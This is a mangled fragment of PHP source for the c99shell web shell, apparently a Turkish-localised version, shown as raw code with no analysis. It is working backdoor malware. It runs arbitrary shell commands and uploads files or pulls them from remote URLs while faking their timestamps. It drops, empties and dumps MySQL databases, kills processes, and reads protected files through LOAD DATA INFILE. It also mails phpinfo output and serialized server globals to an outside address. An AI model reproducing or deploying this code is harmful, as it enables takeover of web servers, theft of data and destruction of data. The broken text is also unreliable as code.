Sistem:  

uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 

izin: 

".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "".view_perms_color($d).""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === false) {$free = 0;} if ($total === false) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "
Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; } echo "
"; $letters = ""; if ($win) { $v = explode("",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.":");} if ($bool) { $letters .= "[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } if (!empty($letters)) {echo "Detected drives: ".$letters."
";} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "".$item[0]."    "; } } echo "

UYARI! SQL-Manager MODU HAZIR DEGIL

SQL DUZENLEYICI: "; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "BAGLANTI YOK"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - "".htmlspecialchars($sql_passwd)."") "; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo ""; } echo "
i If login is null, login is owner of process. If host is null, host is localhost If port is null, port is 3306 (default)	Formlari doldurun: kullanici parola  Database  Host PORT ">anasayfa ".htmlspecialchars($sql_db)." ]--- "; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].") "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { ?> anasayfa ".$row[0].""; $c++;} echo "Databases (".$c.")"; echo $dbs; } ?> Please, select database "; //Start center panel $diplay = true; if ($sql_db) { if (!is_numeric($c)) {$c = 0;} if ($c == 0) {$c = "no";} echo " There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db)."). "; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo ""; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo " "; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo " "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo " ".htmlspecialchars($sql_query)."   ";} } if (in_array($sql_act,$acts)) { ?> Create new table:   Dump DB: ">  ";} if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! "; } else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();} } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = false; echo " SQL-Dump: "; echo "DB:  "; $v = join (";",$dmptbls); echo "Only tables (explode ";") 1:  "; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "dosya:  "; echo "indir:   "; echo "dosyayi kayit et:  "; echo " 1 - all, if empty"; echo " "; } else { $diplay = true; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = true; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename="".basename($sql_dump_file)."";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to "".htmlspecialchars($sql_dump_file).""!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to "".htmlspecialchars(realpath($sql_dump_file))."" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) {$perpage = 10;} $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") {$asc_desc = "DESC";} else {$asc_desc = "ASC";} $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo " Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)"; echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "[ Insert ]   "; if ($sql_tbl_act == "structure") {echo " Coming sooon!";} if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { } else { echo " Inserting row into table: "; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print(" ".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo " "; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo " Field Type Function Value ".htmlspecialchars($name)." ".$field["Type"]." PASSWORDMD5ENCRYPTASCIICHARRANDLAST_INSERT_IDCOUNTAVGSUM--------SOUNDEXLCASEUCASENOWCURDATECURTIMEFROM_DAYSFROM_UNIXTIMEPERIOD_ADDPERIOD_DIFFTO_DAYSUNIX_TIMESTAMPUSERWEEKDAYCONCAT "; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or kayit"; echo "";} echo " "; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo " "; echo " "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo " ";} else {echo " ";} } if ($i == 0) {echo "empty";} echo " From:  To:   "; echo " "; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {echo "".$v."";} else {echo "".$v."";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "NULL";} echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo " Görev ".$v." "; echo " "; echo " "; echo " "; echo "sec:"; echo "Sil"; echo "  "; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo " "; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo " Table Rows Type Created modifiye kapasite görev  ".$row["Name"]."  ".$row["Rows"]." ".$row["Type"]." ".$row["Create_time"]." ".$row["Update_time"]." ".$size."       » ".$i." table(s) ".$trows." ".$row[1]." ".$row[10]." ".$row[11]." ".view_size($tsize)." "; echo "With selected:"; echo "Drop"; echo "Empty"; echo "Dump"; echo "Check table"; echo "Optimize table"; echo "Repair table"; echo "Analyze table"; echo "  "; mysql_free_result($result); } } } } } else { $acts = array("","newdb","serverstatus","servervars","processes","getfile"); if (in_array($sql_act,$acts)) {?> Create new DB:   View File:   "; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! ";} else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "Server-status variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name Value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "Server variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name Value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "Processes: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo " ID USER HOST DB COMMAND TIME STATE INFO Action ".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill "; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = false; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE "".addslashes($sql_getfile)."" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "Error in reading file (permision denied)!";} else { for ($i=0;$iFile "".$sql_getfile."" does not exists or empty! ";} else {echo "File "".$sql_getfile."": ".nl2br(htmlspecialchars($f))." ";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); //comment it if you want to leave database } } } } echo " "; if ($sql_sock) { $affected = @mysql_affected_rows($sql_sock); if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} echo "
Affected rows: ".$affected."

Self-remove: ".__FILE__."
eminmisin?
For confirmation, enter "".$rnd."":  "; } } if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

";}} if ($act == "feedback") { $suppmail = ("karakutu85@hotmail.com"); if (!empty($submit)) { $ticket = substr(md5(microtime()+rand(1,1000)),0,6); $body = "c99shell v.".$shver." feedback #".$ticket."nName: ".htmlspecialchars($fdbk_name)."nE-mail: ".htmlspecialchars($fdbk_email)."nMessage:n".htmlspecialchars($fdbk_body)."nnIP: ".$REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= "n"."phpinfo(): ".$phpinfo."n"."$GLOBALS=".base64_encode(serialize($GLOBALS))."n"; } mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); echo "Rapor icin tesekkurler, rapor ID: ".$ticket."."; } else {echo "

Rapor Gonder (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

adin:

mail:

Mesaj:
".htmlspecialchars($fdbk_body)."

Server bilgilerinide gonder *

formu gozden gecirmeyi unutma.

*buyuk ve guclu acikleri rapor edin, bunlara karsi onlem almak icin

Rapor ederken kulanacaginiz dil: Turkce olmali.

";} } if ($act == "search") { echo "Search in file-system:
"; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = true; $act = "ls"; } } echo "

Search for (file/folder name):   - regexp
Search in (explode ";"):

Text:
".htmlspecialchars($search_text)."

- regexp    - whole words only    - case sensitive    - find files NOT containing the text

"; if ($act == "ls") {$dspact = $act; echo "

---

Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

";} } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = true; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".($err?"Error: ".$err:"")."

Owner  Read  Write eXecute	Group  Read  Write eXecute	World  Read  Write gir

"; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy "".$uploadfile["tmp_name"]."" to "".$uploadpath.$destin.""!
";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file!
";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "Dosya yukle:
".$uploadmess."

Select file on your local computer:
               or
Input URL:

Save this file dir:

File-name (auto-fill):

 convert file name to lovercase

"; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = false; $result = fs_rmobj($v); if (!$result) {$delerr .= "Silinemedi ".htmlspecialchars($v)."
";} } if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;} $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "Sorry, buffer is disabled. For enable, set directive "$useFSbuff" as TRUE.";} } else { if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
";} $ret = str_replace("rn","n",$ret); $ret = explode("n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors:
".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "kopyalanamdi ".$v." dan ".$to."!
";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Gösterilemedi ".$v." dan ".$to."!
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors:
".$psterr;} $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") {$act = "processes";} elseif (trim($cmd) == "tasklist") {$act = "processes";} else { @chdir($chdir); if (!empty($submit)) { echo "komut gir:
"; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("rn",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
".htmlspecialchars($ret).""; } else {echo $ret."
";} @chdir($olddir); } else {echo "komut gir"; if (empty($cmd_txt)) {$cmd_txt = true;}} echo "

".htmlspecialchars($cmd)."

 Display in text-area 

"; } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== false) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo "Dosya acilamadi (".htmlspecialchars($d).")!";} else { //Building array $objects = array(); $vd = "f"; //Viewing mode if ($vd == "f") { $objects["head"] = array(); $objects["folders"] = array(); $objects["links"] = array(); $objects["files"] = array(); foreach ($list as $v) { $o = basename($v); $row = array(); if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} elseif (is_dir($v)) { if (is_link($v)) {$type = "LINK";} else {$type = "DIR";} $row[] = $v; $row[] = $type; } elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} $row[] = filemtime($v); if (!$win) { $ow = posix_getpwuid(fileowner($v)); $gr = posix_getgrgid(filegroup($v)); $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); } $row[] = fileperms($v); if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} elseif (is_link($v)) {$objects["links"][] = $row;} elseif (is_dir($v)) {$objects["folders"][] = $row;} elseif (is_file($v)) {$objects["files"][] = $row;} $i++; } $row = array(); $row[] = "isim"; $row[] = "kota"; $row[] = "degistirme"; if (!$win) {$row[] = "Sahibi";} $row[] = "Perms"; $row[] = "hareket"; $parsesort = parsesort($sort); $sort = $parsesort[0].$parsesort[1]; $k = $parsesort[0]; if ($parsesort[1] != "a") {$parsesort[1] = "d";} $y = ""; $y .= ""; $row[$k] .= $y; for($i=0;$i".$row[$i]."";} } $v = $parsesort[0]; usort($objects["klasorler"], "tabsort"); usort($objects["linkler"], "tabsort"); usort($objects["dosyalar"], "tabsort"); if ($parsesort[1] == "d") { $objects["klasorler"] = array_reverse($objects["folders"]); $objects["dosyalar"] = array_reverse($objects["files"]); } $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); $tab = array(); $tab["cols"] = array($row); $tab["head"] = array(); $tab["folders"] = array(); $tab["links"] = array(); $tab["files"] = array(); $i = 0; foreach ($objects as $a) { $v = $a[0]; $o = basename($v); $dir = dirname($v); if ($disp_fullpath) {$disppath = $v;} else {$disppath = $o;} $disppath = str2mini($disppath,60); if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} foreach ($regxp_highlight as $r) { if (ereg($r[0],$o)) { if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in $regxp_highlight[".$k."][0] - unknown command."; c99shexit();} else { $r[1] = round($r[1]); $isdir = is_dir($v); if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { if (empty($r[2])) {$r[2] = ""; $r[3] = "";} $disppath = $r[2].$disppath.$r[3]; if ($r[4]) {break;} } } } } $uo = urlencode($o); $ud = urlencode($dir); $uv = urlencode($v); $row = array(); if ($o == ".") { $row[] = " ".$o.""; $row[] = "LINK"; } elseif ($o == "..") { $row[] = " ".$o.""; $row[] = "LINK"; } elseif (is_dir($v)) { if (is_link($v)) { $disppath .= " => ".readlink($v); $type = "LINK"; $row[] = " [".$disppath."]"; } else { $type = "DIR"; $row[] = " [".$disppath."]"; } $row[] = $type; } elseif(is_file($v)) { $ext = explode(".",$o); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $row[] = " ".$disppath.""; $row[] = view_size($a[1]); } $row[] = date("d.m.Y H:i:s",$a[2]); if (!$win) {$row[] = $a[3];} $row[] = "".view_perms_color($v).""; if ($o == ".") {$checkbox = ""; $i--;} else {$checkbox = "";} if (is_dir($v)) {$row[] = " ".$checkbox;} else {$row[] = "   ".$checkbox;} if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} elseif (is_link($v)) {$tab["links"][] = $row;} elseif (is_dir($v)) {$tab["folders"][] = $row;} elseif (is_file($v)) {$tab["files"][] = $row;} $i++; } } //Compiling table $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); echo "Listing folder (".count($tab["files"])." files and 